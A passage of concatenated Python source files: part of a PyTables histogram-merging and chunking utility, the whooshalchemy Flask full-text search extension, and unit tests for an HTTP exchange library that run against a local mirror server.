shape.append(tmp_data.shape[i])
else:
shape.append(hist_data.shape[i])
hist_data.resize(shape)
# Add array, ignore size
tmp_data.resize(hist_data.shape)
hist_data += tmp_data
os.remove(f)
dt = hist_data.dtype
out = out_file.create_carray(out_file.root,
atom=tb.Atom.from_dtype(dt),
shape=hist_data.shape,
**self.node_desc)
out[:] = hist_data
def _get_split_indeces(self):
''' Calculates the data range for each core.
Return two lists with start/stop indeces.
Stop indeces are exclusive.
'''
core_chunk_size = self.n_rows // self.n_cores
start_indeces = list(range(0,
self.n_rows,
core_chunk_size)
[:self.n_cores])
if not self.align_at:
stop_indeces = start_indeces[1:]
else:
stop_indeces = self._get_next_index(start_indeces)
start_indeces = [0] + stop_indeces
stop_indeces.append(self.n_rows) # Last index always table size
assert len(stop_indeces) == self.n_cores
assert len(start_indeces) == self.n_cores
return start_indeces, stop_indeces
def _get_next_index(self, indeces):
''' Get closest index where the alignment column changes '''
next_indeces = []
for index in indeces[1:]:
with tb.open_file(self.table_file_in) as in_file:
node = in_file.get_node(in_file.root, self.node_name)
values = node[index:index + self.chunk_size][self.align_at]
value = values[0]
for i, v in enumerate(values):
if v != value:
next_indeces.append(index + i)
break
value = v
return next_indeces
def _chunks_at_event(self, table, start_index=None, stop_index=None,
chunk_size=1000000):
'''Takes the table with a event_number column and returns chunks.
The chunks are chosen in a way that the events are not splitted.
Start and the stop indices limiting the table size can be specified to
improve performance. The event_number column must be sorted.
Parameters
----------
table : pytables.table
The data.
start_index : int
Start index of data. If None, no limit is set.
stop_index : int
Stop index of data. If None, no limit is set.
chunk_size : int
Maximum chunk size per read.
Returns
-------
Iterator of tuples
Data of the actual data chunk and start index for the next chunk.
Example
-------
for data, index in chunk_aligned_at_events(table):
do_something(data)
show_progress(index)
'''
# Initialize variables
if not start_index:
start_index = 0
if not stop_index:
stop_index = table.shape[0]
# Limit max index
if stop_index > table.shape[0]:
stop_index = table.shape[0]
# Special case, one read is enough, data not bigger than one chunk and
# the indices are known
if start_index + chunk_size >= stop_index:
yield table.read(start=start_index, stop=stop_index), stop_index
else: # Read data in chunks, chunks do not divide events
current_start_index = start_index
while current_start_index < stop_index:
current_stop_index = min(current_start_index + chunk_size,
stop_index)
chunk = table[current_start_index:current_stop_index]
if current_stop_index == stop_index: # Last chunk
yield chunk, stop_index
break
# Find maximum non event number splitting index
event_numbers = chunk["event_number"]
last_event = event_numbers[-1]
# Search for next event number
chunk_stop_i = np.searchsorted(event_numbers,
last_event,
side="left")
yield chunk[:chunk_stop_i], current_start_index + chunk_stop_i
current_start_index += chunk_stop_i
if __name__ == '__main__':
pass
| |
'''
whooshalchemy flask extension
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Adds whoosh indexing capabilities to SQLAlchemy models for Flask
applications.
:copyright: (c) 2012 by Karl Gyllstrom
:license: BSD (see LICENSE.txt)
'''
from __future__ import with_statement
from __future__ import absolute_import
import flask_sqlalchemy as flask_sqlalchemy
import sqlalchemy
from whoosh.qparser import OrGroup
from whoosh.qparser import AndGroup
from whoosh.qparser import MultifieldParser
from whoosh.analysis import StemmingAnalyzer
import whoosh.index
from whoosh.fields import Schema
#from whoosh.fields import ID, TEXT, KEYWORD, STORED
import heapq
import os
__searchable__ = '__searchable__'
DEFAULT_WHOOSH_INDEX_NAME = 'whoosh_index'
try:
unicode
except NameError:
unicode = str
class _QueryProxy(flask_sqlalchemy.BaseQuery):
# We're replacing the model's ``query`` field with this proxy. The main
# thing this proxy does is override the __iter__ method so that results are
# returned in the order of the whoosh score to reflect text-based ranking.
def __init__(self, entities, session=None):
super(_QueryProxy, self).__init__(entities, session)
self._modelclass = self._mapper_zero().class_
self._primary_key_name = self._modelclass.whoosh_primary_key
self._whoosh_searcher = self._modelclass.pure_whoosh
# Stores whoosh results from query. If ``None``, indicates that no
# whoosh query was performed.
self._whoosh_rank = None
def __iter__(self):
''' Reorder ORM-db results according to Whoosh relevance score. '''
super_iter = super(_QueryProxy, self).__iter__()
if self._whoosh_rank is None:
# Whoosh search hasn't been run so behave as normal.
return super_iter
# Iterate through the values and re-order by whoosh relevance.
ordered_by_whoosh_rank = []
for row in super_iter:
# Push items onto heap, where sort value is the rank provided by
# Whoosh
heapq.heappush(ordered_by_whoosh_rank,
(self._whoosh_rank[unicode(getattr(row,
self._primary_key_name))], row))
def _inner():
while ordered_by_whoosh_rank:
yield heapq.heappop(ordered_by_whoosh_rank)[1]
return _inner()
def whoosh_search(self, query, limit=None, fields=None, or_=False):
'''
Execute text query on database. Results have a text-based
match to the query, ranked by the scores from the underlying Whoosh
index.
By default, the search is executed on all of the indexed fields as an
OR conjunction. For example, if a model has 'title' and 'content'
indicated as ``__searchable__``, a query will be checked against both
fields, returning any instance whose title or content are a content
match for the query. To specify particular fields to be checked,
populate the ``fields`` parameter with the desired fields.
By default, results will only be returned if they contain all of the
query terms (AND). To switch to an OR grouping, set the ``or_``
parameter to ``True``.
'''
if not isinstance(query, unicode):
query = unicode(query)
results = self._whoosh_searcher(query, limit, fields, or_)
if not results:
# We don't want to proceed with empty results because we get a
# stderr warning from sqlalchemy when executing 'in_' on empty set.
# However we cannot just return an empty list because it will not
# be a query.
# XXX is this efficient?
return self.filter(sqlalchemy.text('null'))
result_set = set()
result_ranks = {}
for rank, result in enumerate(results):
pk = result[self._primary_key_name]
result_set.add(pk)
result_ranks[pk] = rank
f = self.filter(getattr(self._modelclass,
self._primary_key_name).in_(result_set))
f._whoosh_rank = result_ranks
return f
class _Searcher(object):
''' Assigned to a Model class as ``pure_search``, which enables
text-querying to whoosh hit list. Also used by ``query.whoosh_search``'''
def __init__(self, primary, indx):
self.primary_key_name = primary
self._index = indx
self.searcher = indx.searcher()
self._all_fields = list(set(indx.schema._fields.keys()) -
set([self.primary_key_name]))
def __call__(self, query, limit=None, fields=None, or_=False):
if fields is None:
fields = self._all_fields
group = OrGroup if or_ else AndGroup
parser = MultifieldParser(fields, self._index.schema, group=group)
return self._index.searcher().search(parser.parse(query),
limit=limit)
def whoosh_index(app, model):
''' Create whoosh index for ``model``, if one does not exist. If
the index exists it is opened and cached. '''
# gets the whoosh index for this model, creating one if it does not exist.
# A dict of model -> whoosh index is added to the ``app`` variable.
if not hasattr(app, 'whoosh_indexes'):
app.whoosh_indexes = {}
return app.whoosh_indexes.get(model.__name__,
_create_index(app, model))
def _get_analyzer(app, model):
analyzer = getattr(model, '__analyzer__', None)
if not analyzer and app.config.get('WHOOSH_ANALYZER'):
analyzer = app.config['WHOOSH_ANALYZER']
if not analyzer:
analyzer = StemmingAnalyzer()
return analyzer
def _create_index(app, model):
# a schema is created based on the fields of the model. Currently we only
# support primary key -> whoosh.ID, and sqlalchemy.(String, Unicode, Text)
# -> whoosh.TEXT.
if not app.config.get('WHOOSH_BASE'):
# XXX todo: is there a better approach to handle the absenSe of a
# config value for whoosh base? Should we throw an exception? If
# so, this exception will be thrown in the after_commit function,
# which is probably not ideal.
app.config['WHOOSH_BASE'] = DEFAULT_WHOOSH_INDEX_NAME
# we index per model.
wi = os.path.join(app.config.get('WHOOSH_BASE'),
model.__name__)
analyzer = _get_analyzer(app, model)
schema, primary_key = _get_whoosh_schema_and_primary_key(model, analyzer)
if whoosh.index.exists_in(wi):
indx = whoosh.index.open_dir(wi)
else:
if not os.path.exists(wi):
os.makedirs(wi)
indx = whoosh.index.create_in(wi, schema)
app.whoosh_indexes[model.__name__] = indx
model.pure_whoosh = _Searcher(primary_key, indx)
model.whoosh_primary_key = primary_key
# change the query class of this model to our own
model.query_class = _QueryProxy
return indx
def _get_whoosh_schema_and_primary_key(model, analyzer):
schema = {}
primary = None
searchable = set(model.__searchable__)
for field in model.__table__.columns:
if field.primary_key:
schema[field.name] = whoosh.fields.ID(stored=True, unique=True)
primary = field.name
if field.name in searchable and isinstance(field.type,
(sqlalchemy.types.Text, sqlalchemy.types.String,
sqlalchemy.types.Unicode)):
schema[field.name] = whoosh.fields.TEXT(analyzer=analyzer)
return Schema(**schema), primary
def _after_flush(app, changes):
# Any db updates go through here. We check if any of these models have
# ``__searchable__`` fields, indicating they need to be indexed. With these
# we update the whoosh index for the model. If no index exists, it will be
# created here; this could impose a penalty on the initial commit of a
# model.
bytype = {} # sort changes by type so we can use per-model writer
for change in changes:
update = change[1] in ('update', 'insert')
if hasattr(change[0].__class__, __searchable__):
bytype.setdefault(change[0].__class__.__name__, []).append((update,
change[0]))
for model, values in bytype.items():
index = whoosh_index(app, values[0][1].__class__)
with index.writer() as writer:
primary_field = values[0][1].pure_whoosh.primary_key_name
searchable = values[0][1].__searchable__
for update, v in values:
if update:
attrs = {}
for key in searchable:
try:
attrs[key] = unicode(getattr(v, key))
except AttributeError:
raise AttributeError('{0} does not have {1} field {2}'
.format(model, __searchable__, key))
attrs[primary_field] = unicode(getattr(v, primary_field))
writer.update_document(**attrs)
else:
writer.delete_by_term(primary_field, unicode(getattr(v,
primary_field)))
flask_sqlalchemy.models_committed.connect(_after_flush)
| |
import unittest
from multiprocessing import Process
import requests
import json
import time
from ..exchange import Exchange
from ..config import DefaultConfig
from ..auth import Auth
from ..error import TimeoutError,ResponseError
from grabbag.list import first_not_none
from grabbag.dict import merge
TEST_METHODS = ('GET','POST','PUT','DELETE')
TEST_DATAS = ('','{"json":true}','<html></html>')
TEST_PARAMS = ({'a':'1'},{'a':'z'},{},{'c':'3'})
TEST_HEADERS = ({'a':'1'},{'a':'z'},{},{'c':'3'})
class TestAuth(Auth): pass
class TestExchange(Exchange):
protocol = 'http'
domain = 'localhost:8087'
base_path = '/blah/v1'
sub_path = 'mirror/create'
def process_response(self, response): return json.loads(response.content)
class TestExchange2(Exchange): pass
def webserver():
from bottle import route, run, request, error
@route('/blah/v1/mirror/:extra', method='GET')
def get(extra): return mirror(extra)
@route('/blah/v1/mirror/:extra', method='POST')
def post(extra): return mirror(extra)
@route('/blah/v1/mirror/:extra', method='PUT')
def putextra(extra): return mirror(extra)
@route('/blah/v1/mirror/:extra', method='DELETE')
def delete(extra): return mirror(extra)
@error(404)
def bad(code): return 'bad'
@route('/sleep/:ms', method='GET')
def sleep(ms):
time.sleep(int(ms)/1000.0)
return json.dumps( {'sleep': ms} )
def mirror(extra):
return json.dumps( dict(
method = request.method,
protocol = request.urlparts[0],
domain = request.urlparts[1],
path = request.urlparts[2],
body = request.body.getvalue(),
params = dict((k,request.query.getall(k)) for k in request.query.keys()),
headers = dict((k,request.headers.get(k)) for k in request.headers.keys())))
run(host='localhost', port=8087)
class ExchangeTest(unittest.TestCase):
@classmethod
def setUpClass(kls):
kls.webserver_process = Process(target=webserver)
kls.webserver_process.start()
working = False
while not working:
time.sleep(0.02)
try:
working = requests.get('http://localhost:8087/blah/v1/mirror/whatever').status_code == 200
except: pass
@classmethod
def tearDownClass(kls):
kls.webserver_process.terminate()
kls.webserver_process.join()
def setUp(self): pass
def tearDown(self): pass
def _test_expected_attr(self, attr, possibles, default=None, add_none=True, final_possibles=None):
final_possibles = list(final_possibles or possibles)
if add_none:
possibles = [None] + list(possibles)
final_possibles = [None] + list(final_possibles)
for k,x in zip(possibles,final_possibles):
for l in (True, False):
for m,z in zip(possibles,final_possibles):
for n,w in zip(possibles, final_possibles):
class TestExchangeX(TestExchange2): pass
if l:
if k is not None: setattr(TestExchangeX, attr, k)
else:
if k is not None: setattr(TestExchangeX, attr, lambda self: k)
auth = Auth()
if n is not None: setattr(auth,attr,n)
self.assertEquals(default if n is None else n, getattr(auth,attr,None))
ex = TestExchangeX(auth, **{attr:m})
self.assertEquals(first_not_none( (z,x,w), default), getattr(ex, attr))
def _test_additive_attr(self, attr, possibles, add_none=True):
if add_none:
possibles = [None] + list(possibles)
for k in possibles:
for l in (True,False):
for m in possibles:
for n in possibles:
class TestExchangeX(TestExchange): pass
auth = Auth()
setattr(auth,attr,n)
if l:
if k is not None: setattr(TestExchangeX, attr, k)
else:
if k is not None: setattr(TestExchangeX, attr, lambda self: k)
ex = TestExchangeX(auth, **{attr:m})
self.assertEquals( merge({}, n or {}, k or {}, m or {}), getattr(ex, attr))
def test_calcs(self):
self._test_expected_attr('method', TEST_METHODS, DefaultConfig.method)
self._test_expected_attr('protocol', ('http','https'), DefaultConfig.protocol)
self._test_expected_attr('domain', ('app.localhost','app.hubspotqa.com','app.hubspot.com'), add_none=False)
self._test_expected_attr('base_path', ('/v1/whatever/','/base/path','') , None, final_possibles=('v1/whatever','base/path',None))
self._test_expected_attr('sub_path', ('/create','','show/'), None, final_possibles=('create',None,'show'))
self._test_expected_attr('data', TEST_DATAS)
self._test_expected_attr('timeout', (10,20,30), DefaultConfig.timeout)
self._test_expected_attr('max_retries', (0,1,2), DefaultConfig.max_retries)
###TODO: make it possible to use params as they can be used (i.e. multiple values per key -- i.e. MultiDict)
self._test_additive_attr('params', TEST_PARAMS)
self._test_additive_attr('headers', TEST_HEADERS)
def test_timeouts(self):
self.assertTrue(TestExchange(TestAuth(), timeout=0.5).result)
with self.assertRaises(TimeoutError):
self.assertTrue(TestExchange(TestAuth(), timeout=0.00001).result)
def test_methods(self):
for method in TEST_METHODS:
self.assertEquals(method, TestExchange(TestAuth(), method=method).result['method'])
def test_datas(self):
for data in TEST_DATAS:
self.assertEquals(data, TestExchange(TestAuth(), data=data).result['body'])
def test_sub_paths(self):
for sub_path in ('create','show','list'):
self.assertEquals("/blah/v1/mirror/%s"%sub_path, TestExchange(TestAuth(), base_path='blah/v1/mirror', sub_path=sub_path).result['path'])
def test_params(self):
for params in TEST_PARAMS:
self.assertEquals(dict((k,[v]) for k,v in params.iteritems()), TestExchange(TestAuth(), params=params).result['params'])
def test_headers(self):
for headers in TEST_HEADERS:
self.assertEquals(dict((k.upper(),v) for k,v in headers.iteritems()), dict((k.upper(),v) for k,v in TestExchange(TestAuth(), headers=headers).result['headers'].iteritems() if k.lower() in headers.keys()))
def test_max_retries(self):
for max_retries in (0,1,2):
try:
self.assertTrue(TestExchange(TestAuth(), timeout=0.00001, max_retries=max_retries).result)
except TimeoutError as err:
self.assertEquals(max_retries+1, len(err.exchange.failures))
for f in err.exchange.failures:
self.assertTrue(isinstance(f, TimeoutError))
continue
except:
self.fail("should not get to here")
self.fail("should not get to here")
def test_bulk_exchange(self):
count = 5
for async in (True,False):
exs = [TestExchange(TestAuth(), params={'i':str(i), 'async':str(async)}) for i in xrange(count)]
for ex,i in zip(Exchange.async_exchange(exs), xrange(count)):
self.assertEquals([str(i)],ex.result['params']['i'])
self.assertEquals([str(async)],ex.result['params']['async'])
def test_different_auth(self):
class TestAuth1(Auth):
def params(self): return {'key1':'value1'}
class TestAuth2(Auth):
def params(self): return {'key2':'value2'}
class TestExchange1(Exchange): pass
class TestExchange2(Exchange): pass
self.assertEquals({'key1':'value1'},TestExchange1(TestAuth1()).params)
self.assertEquals({'key2':'value2'},TestExchange1(TestAuth2()).params)
def test_bad_url(self):
class TestExchange(Exchange):
protocol = 'http'
domain = 'localhost:8087'
base_path = 'bad'
ok404 = True
def process_error(self, error, response):
if response is not None:
if response.status_code==404:
return self.ok404
return False
def process_response(self, response): return response.text
self.assertEquals('bad',TestExchange(TestAuth()).result)
TestExchange.ok404=False
with self.assertRaises(ResponseError):
self.assertTrue(TestExchange(TestAuth()).result)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.